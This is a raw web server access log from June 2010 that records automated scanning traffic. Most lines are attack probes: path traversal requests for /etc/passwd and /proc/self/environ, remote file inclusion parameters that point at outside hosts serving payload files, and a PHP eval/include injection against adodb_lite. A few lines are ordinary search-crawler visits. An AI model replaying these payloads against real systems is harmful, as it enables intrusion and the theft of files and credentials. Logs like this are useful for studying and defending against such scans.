188.72.70.56 - - [21/Jun/2010:01:25:59 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:26:07 -0400] "GET /logs/access_log.Q110060800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:26:14 -0400] "GET /logs/error_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
125.249.199.195 - - [21/Jun/2010:01:26:39 -0400] "GET /logs/access_log.Q110032700%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.15.152.183 - - [21/Jun/2010:01:26:46 -0400] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
62.43.194.164 - - [21/Jun/2010:01:26:52 -0400] "GET /logs/access_log.Q109070500%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:01:26:52 -0400] "GET /logs/error_log.Q109070500%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.73.166.6 - - [21/Jun/2010:01:27:21 -0400] "GET /?step=1&vwar_root=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:23 -0400] "GET /?step=1&vwar_root=../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:24 -0400] "GET /?step=1&vwar_root=../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:26 -0400] "GET /?step=1&vwar_root=../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:28 -0400] "GET /?step=1&vwar_root=../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:29 -0400] "GET /?step=1&vwar_root=../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:31 -0400] "GET /?step=1&vwar_root=../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
188.72.70.56 - - [21/Jun/2010:01:27:32 -0400] "GET /logs/error_log.Q110061400//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
69.73.166.6 - - [21/Jun/2010:01:27:33 -0400] "GET /?step=1&vwar_root=../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
188.72.70.56 - - [21/Jun/2010:01:27:33 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:27:34 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
69.73.166.6 - - [21/Jun/2010:01:27:34 -0400] "GET /?step=1&vwar_root=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:36 -0400] "GET /?step=1&vwar_root=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:38 -0400] "GET /?step=1&vwar_root=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:39 -0400] "GET /?step=1&vwar_root=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:27:41 -0400] "GET /?step=1&vwar_root=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
188.72.70.56 - - [21/Jun/2010:01:27:51 -0400] "GET /logs/error_log.Q110061600//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
82.76.12.197 - - [21/Jun/2010:01:28:26 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
211.234.100.196 - - [21/Jun/2010:01:29:13 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
211.234.100.196 - - [21/Jun/2010:01:29:13 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.15.152.183 - - [21/Jun/2010:01:29:56 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:29:57 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:29:58 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:30:29 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:30:38 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.195.114.223 - - [21/Jun/2010:01:30:22 -0400] "GET /logs/error_log.Q109062300 HTTP/1.0" 200 2793028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.42.16.25 - - [21/Jun/2010:01:31:25 -0400] "GET /logs/access_log.Q109111400//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.17.105.143 - - [21/Jun/2010:01:31:32 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
87.106.28.150 - - [21/Jun/2010:01:31:45 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
87.106.28.150 - - [21/Jun/2010:01:31:45 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.28.150 - - [21/Jun/2010:01:31:45 -0400] "GET /logs/access_log.Q109100100/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
67.15.152.183 - - [21/Jun/2010:01:31:57 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
87.106.28.150 - - [21/Jun/2010:01:32:10 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
78.129.168.234 - - [21/Jun/2010:01:32:10 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "Mozilla/5.0"
78.129.168.234 - - [21/Jun/2010:01:32:11 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.129.168.234 - - [21/Jun/2010:01:32:11 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:01:32:20 -0400] "GET /logs/error_log.Q110050400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
78.129.168.234 - - [21/Jun/2010:01:32:26 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.17.105.143 - - [21/Jun/2010:01:32:36 -0400] "GET /logs/access_log.Q110051800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:32:36 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:32:36 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.830"
85.235.154.15 - - [21/Jun/2010:01:33:12 -0400] "GET /logs/access_log.Q110042800%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:33:12 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:33:12 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:33:13 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:33:13 -0400] "GET /logs/access_log.Q110042800%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:33:13 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.44.82.118 - - [21/Jun/2010:01:33:34 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
123.125.66.122 - - [21/Jun/2010:01:33:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.235.154.15 - - [21/Jun/2010:01:33:47 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:33:47 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:33:47 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:33:48 -0400] "GET /logs/access_log.Q109052700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
82.76.12.197 - - [21/Jun/2010:01:34:05 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:34:14 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
67.59.156.163 - - [21/Jun/2010:01:34:19 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:34:20 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:34:22 -0400] "GET /logs/access_log.Q110042800%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:34:23 -0400] "GET /logs/error_log.Q109070600%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.44.82.118 - - [21/Jun/2010:01:34:29 -0400] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
67.59.156.163 - - [21/Jun/2010:01:34:31 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:34:31 -0400] "GET /logs/access_log.Q110042800%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:34:32 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.17.105.143 - - [21/Jun/2010:01:34:33 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
99.198.113.90 - - [21/Jun/2010:01:34:49 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "Mozilla/5.0"
99.198.113.90 - - [21/Jun/2010:01:34:49 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "Mozilla/5.0"
99.198.113.90 - - [21/Jun/2010:01:34:49 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "Mozilla/5.0"
66.249.71.206 - - [21/Jun/2010:01:34:54 -0400] "GET /logs/access_log.Q109051200&if=1 HTTP/1.1" 404 233 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
99.198.113.90 - - [21/Jun/2010:01:35:03 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:35:26 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:35:26 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:35:28 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:35:31 -0400] "GET /logs/access_log.Q109052700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:35:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:35:41 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:35:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:35:46 -0400] "GET /logs/access_log.Q109052700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.44.82.118 - - [21/Jun/2010:01:35:47 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
62.44.82.118 - - [21/Jun/2010:01:35:48 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.44.82.118 - - [21/Jun/2010:01:35:48 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
85.235.154.15 - - [21/Jun/2010:01:35:53 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:35:53 -0400] "GET /logs/access_log.Q110042800//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:35:53 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:35:53 -0400] "GET /logs/access_log.Q110042800//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:35:53 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:35:53 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.17.105.143 - - [21/Jun/2010:01:35:58 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
85.235.154.15 - - [21/Jun/2010:01:35:59 -0400] "GET /logs/access_log.Q110010700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:36:00 -0400] "GET /logs/access_log.Q110010700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:01:36:06 -0400] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
82.76.12.197 - - [21/Jun/2010:01:36:09 -0400] "GET /logs/access_log.Q110051800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:36:09 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
67.218.116.169 - - [21/Jun/2010:01:36:09 -0400] "GET /images/_notes/nav_store_fav_off_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
82.76.12.197 - - [21/Jun/2010:01:36:10 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.831"
216.17.105.143 - - [21/Jun/2010:01:36:11 -0400] "GET /logs/access_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
202.125.152.246 - - [21/Jun/2010:01:36:13 -0400] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:01:36:13 -0400] "GET /logs/access_log.Q109080600//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.71.50 - - [21/Jun/2010:01:36:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC5371C6200065B300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.235.154.15 - - [21/Jun/2010:01:36:27 -0400] "GET /logs/error_log.Q109081300%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
178.63.49.141 - - [21/Jun/2010:01:36:27 -0400] "HEAD / HTTP/1.1" 200 - "http://www.aceonlinestore.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:28 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:28 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:28 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:29 -0400] "GET / HTTP/1.1" 200 409 "https://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "http://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /logs/ HTTP/1.1" 200 55286 "http://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /index.htm HTTP/1.1" 200 870 "http://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /images/ HTTP/1.1" 200 49338 "http://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /index.htm HTTP/1.1" 200 870 "https://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /scripts/ HTTP/1.1" 200 802 "http://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /Includes/ HTTP/1.1" 200 220 "http://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /Includes/ HTTP/1.1" 200 220 "https://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "https://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
